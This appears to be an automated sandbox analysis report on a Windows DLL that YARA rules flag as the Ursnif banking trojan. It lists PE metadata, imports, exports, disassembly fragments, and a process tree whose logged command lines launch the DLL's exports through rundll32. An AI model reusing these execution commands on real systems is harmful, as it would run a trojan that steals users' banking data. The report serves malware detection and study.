                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007F95A8C73997h
                        call 00007F95A8C74372h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007F95A8C7383Fh
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        mov ecx, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], ecx
                        pop ecx
                        pop edi
                        pop edi
                        pop esi
                        pop ebx
                        mov esp, ebp
                        pop ebp
                        push ecx
                        ret
                        mov ecx, dword ptr [ebp-10h]
                        xor ecx, ebp
                        call 00007F95A8C731A6h
                        jmp 00007F95A8C73970h
                        mov ecx, dword ptr [ebp-14h]
                        xor ecx, ebp
                        call 00007F95A8C73195h
                        jmp 00007F95A8C7395Fh
                        push eax
                        push dword ptr fs:[00000000h]
                        lea eax, dword ptr [esp+0Ch]
                        sub esp, dword ptr [esp+0Ch]
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [eax], ebp
                        mov ebp, eax
                        mov eax, dword ptr [010E506Ch]
                        xor eax, ebp
                        push eax
                        push dword ptr [ebp-04h]
                        mov dword ptr [ebp-04h], FFFFFFFFh
                        lea eax, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], eax
                        ret
                        push eax
                        push dword ptr fs:[00000000h]
                        lea eax, dword ptr [esp+0Ch]
                        sub esp, dword ptr [esp+0Ch]
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [eax], ebp
                        mov ebp, eax
                        mov eax, dword ptr [010E506Ch]
                        xor eax, ebp
                        push eax
                        mov dword ptr [ebp-10h], eax
                        push dword ptr [ebp-04h]
                        mov dword ptr [ebp-04h], FFFFFFFFh
                        lea eax, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], eax
                        ret
                        push eax
                        inc dword ptr fs:[eax]

                        Rich Headers

                        Programming Language:
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0xe35b00x9c.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe364c0x8c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xfd0000x9d0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xfe0000x5074.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xde8200x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xde8780x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x8a0000x26c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x883dc0x88400False0.544624426606data6.71834204494IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x8a0000x5a4400x5a600False0.658643456086data5.95813601066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xe50000x17ebc0x1c00False0.184291294643data4.04646123564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0xfd0000x9d00xa00False0.396484375data3.77819611332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xfe0000x50740x5200False0.726133765244data6.63977268899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_DIALOG0xfd1c00x10edataEnglishUnited States
                        RT_DIALOG0xfd2d00xc0dBase III DBT, next free block index 4294901761EnglishUnited States
                        RT_DIALOG0xfd3900x126dataEnglishUnited States
                        RT_DIALOG0xfd4b80xf0dataEnglishUnited States
                        RT_DIALOG0xfd5a80xbadataEnglishUnited States
                        RT_DIALOG0xfd6640xecdataEnglishUnited States
                        RT_DIALOG0xfd7500x124dataEnglishUnited States
                        RT_MANIFEST0xfd8740x15aASCII text, with CRLF line terminatorsEnglishUnited States

                        Imports

                        DLLImport
                        KERNEL32.dllSetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetProcessHeap, CreateFileW, SetStdHandle, ReadConsoleW, WriteConsoleW, HeapSize, SetEndOfFile, SetEnvironmentVariableW, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, GetTimeZoneInformation, OutputDebugStringA, OutputDebugStringW, WaitForSingleObjectEx, CreateSemaphoreA, GetSystemTimeAsFileTime, TlsGetValue, VirtualProtectEx, TlsAlloc, GetSystemDirectoryA, GetTempPathA, Sleep, GetCommandLineA, GetModuleHandleA, InitializeCriticalSection, SetSystemPowerState, EnterCriticalSection, VirtualProtect, GetModuleFileNameA, MultiByteToWideChar, GetLastError, FormatMessageW, WideCharToMultiByte, GetStringTypeW, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetACP, GetStdHandle, GetFileType, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessA, CreateProcessW, GetFileAttributesExW, WriteFile, GetConsoleCP, GetConsoleMode, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, ReadFile, SetFilePointerEx, HeapReAlloc, SetConsoleCtrlHandler, CreateThread
                        USER32.dllSetFocus, GetCursorPos, RegisterClassExA, GetFocus, GetClassInfoExA, GetKeyNameTextA, GetWindowTextLengthA, CallWindowProcA, IsDlgButtonChecked, DestroyIcon, AppendMenuA, DrawIconEx, DrawEdge
                        GDI32.dllBitBlt, DeleteDC, CreatePen, DeleteObject, CreateDCA, GetObjectA, DPtoLP
                        ole32.dllOleUninitialize, OleSetContainedObject, OleInitialize
                        SHLWAPI.dllPathFindFileNameA, PathAddBackslashW, PathStripToRootA
                        DCIMAN32.dllDCICreatePrimary, DCIOpenProvider, GetDCRegionData, DCISetDestination, DCICloseProvider, DCICreateOverlay, GetWindowRegionData, DCIEndAccess, WinWatchDidStatusChange, DCICreateOffscreen, DCISetSrcDestClip, DCIDestroy, DCIDraw, DCISetClipList, DCIEnum, DCIBeginAccess, WinWatchClose

                        Exports

                        NameOrdinalAddress
                        Connectdark10x1021c64
                        Mindlake20x1020de0
                        Porthigh30x1021c2c
                        Problemscale40x1021bf8
                        WingGrass50x1021b0a

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        No network behavior found

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: loaddll32.exe PID: 1084 Parent PID: 5520

                        General

                        Start time:06:34:37
                        Start date:15/07/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll'
                        Imagebase:0x810000
                        File size:116736 bytes
                        MD5 hash:542795ADF7CC08EFCF675D65310596E8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 6108 Parent PID: 1084

                        General

                        Start time:06:34:37
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4604 Parent PID: 1084

                        General

                        Start time:06:34:38
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Connectdark
                        Imagebase:0x3f0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6032 Parent PID: 6108

                        General

                        Start time:06:34:38
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1
                        Imagebase:0x3f0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 6000 Parent PID: 4604

                        General

                        Start time:06:34:38
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 3236 Parent PID: 6032

                        General

                        Start time:06:34:38
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 4436 Parent PID: 6000

                        General

                        Start time:06:34:39
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 6132 Parent PID: 3236

                        General

                        Start time:06:34:39
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 5072 Parent PID: 4604

                        General

                        Start time:06:34:39
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 852 Parent PID: 6032

                        General

                        Start time:06:34:39
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 5672 Parent PID: 5072

                        General

                        Start time:06:34:40
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 5848 Parent PID: 852

                        General

                        Start time:06:34:40
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4120 Parent PID: 1084

                        General

                        Start time:06:34:42
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Mindlake
                        Imagebase:0x3f0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 772 Parent PID: 4120

                        General

                        Start time:06:34:43
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 2044 Parent PID: 772

                        General

                        Start time:06:34:43
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5932 Parent PID: 1084

                        General

                        Start time:06:34:46
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Porthigh
                        Imagebase:0x3f0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000F.00000002.503861971.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 5288 Parent PID: 4120

                        General

                        Start time:06:34:46
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 4196 Parent PID: 5288

                        General

                        Start time:06:34:47
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 4608 Parent PID: 5932

                        General

                        Start time:06:34:47
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 6132 Parent PID: 4608

                        General

                        Start time:06:34:48
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 5868 Parent PID: 5932

                        General

                        Start time:06:34:51
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5672 Parent PID: 1084

                        General

                        Start time:06:34:51
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,Problemscale
                        Imagebase:0x3f0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 1124 Parent PID: 5868

                        General

                        Start time:06:34:51
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 5848 Parent PID: 5672

                        General

                        Start time:06:34:53
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 2140 Parent PID: 5848

                        General

                        Start time:06:34:54
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4848 Parent PID: 1084

                        General

                        Start time:06:34:54
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\ELQSEuKior.dll,WingGrass
                        Imagebase:0x3f0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 4196 Parent PID: 4848

                        General

                        Start time:06:34:56
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 2100 Parent PID: 4196

                        General

                        Start time:06:34:56
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 6132 Parent PID: 5672

                        General

                        Start time:06:34:57
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 1276 Parent PID: 6132

                        General

                        Start time:06:34:58
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 4960 Parent PID: 1084

                        General

                        Start time:06:34:58
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Island
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 4020 Parent PID: 4848

                        General

                        Start time:06:35:03
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 852 Parent PID: 1084

                        General

                        Start time:06:35:05
                        Start date:15/07/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c cd Matter m
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 5796 Parent PID: 4020

                        General

                        Start time:06:35:05
                        Start date:15/07/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Disassembly

                        Code Analysis

                        Reset < >

                          Analysis Process: loaddll32.exe PID: 1084 Parent PID: 5520 loaddll32.exeCOMMON

                          Execution Graph

                          Execution Coverage:1.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:2.7%
                          Total number of Nodes:364
                          Total number of Limit Nodes:13

                          Graph

                          execution_graph 27178 6e21ae21 LCMapStringW __Towlower 27270 6e206c21 40 API calls std::_System_error_category::default_error_condition 27271 6e20c821 80 API calls 27272 6e209821 SetLastError 27275 6e201c2c GetModuleHandleA GetModuleFileNameA 26780 6e207833 26783 6e2078d3 26780->26783 26782 6e207842 26784 6e2078df __EH_prolog3 26783->26784 26789 6e21f8b6 26784->26789 26788 6e207900 moneypunct 26788->26782 26792 6e21f8bb 26789->26792 26791 6e2078ee 26791->26788 26797 6e207005 26791->26797 26792->26791 26794 6e21f8d7 moneypunct 26792->26794 26809 6e2423d2 26792->26809 26816 6e249256 7 API calls 2 library calls 26792->26816 26817 6e223d74 RaiseException 26794->26817 26796 6e220603 26798 6e207011 __EH_prolog3 26797->26798 26820 6e206653 26798->26820 26803 6e20702f 26832 6e2071c4 26803->26832 26804 6e20708d moneypunct 26804->26788 26808 6e20704d 26837 6e2066ba LeaveCriticalSection LeaveCriticalSection std::_Lockit::_Lockit_ctor 26808->26837 26815 6e24f26d std::_Locinfo::_W_Getmonths 26809->26815 26810 6e24f2ab 26819 6e242281 20 API calls __dosmaperr 26810->26819 26812 6e24f296 RtlAllocateHeap 26813 6e24f2a9 26812->26813 26812->26815 26813->26792 26815->26810 26815->26812 26818 6e249256 7 API calls 2 library calls 26815->26818 26816->26792 26817->26796 26818->26815 26819->26813 26821 6e206662 26820->26821 26822 6e206669 26820->26822 26838 6e2423c0 EnterCriticalSection _Atexit 26821->26838 26823 6e206667 26822->26823 26839 6e209339 EnterCriticalSection 26822->26839 26823->26808 26826 6e2071a1 26823->26826 26827 6e21f8b6 moneypunct 22 API calls 26826->26827 26828 6e2071ac 26827->26828 26829 6e2071c0 26828->26829 26840 6e206e05 21 API calls _Yarn 26828->26840 26829->26803 26831 6e2071be 26831->26803 26833 6e2071d0 26832->26833 26834 6e207037 26832->26834 26841 6e20db5a 26833->26841 26836 6e206f34 21 API calls 2 library calls 26834->26836 26836->26808 26837->26804 26838->26823 26839->26823 26840->26831 26842 6e20db6a RtlEncodePointer 26841->26842 26849 6e2462da 26841->26849 26842->26834 26844 6e246314 IsProcessorFeaturePresent 26844->26849 26848 6e2463c1 26848->26834 26849->26834 26849->26844 26849->26848 26850 6e257c4f EnterCriticalSection LeaveCriticalSection _Atexit 26849->26850 26851 6e257cb3 38 API calls 6 library calls 26849->26851 26852 6e241f6d 8 API calls 2 library calls 26849->26852 26853 6e249779 28 API calls _Atexit 26849->26853 26850->26849 26851->26849 26852->26849 26853->26849 27278 6e25d804 41 API calls 5 library calls 27279 6e207c02 68 API calls _AnonymousOriginator 27181 6e209a14 GetSystemTimeAsFileTime 27184 6e202262 86 API calls 2 library calls 27286 6e225860 5 API calls 2 library calls 27287 6e201c64 29 API calls 3 library 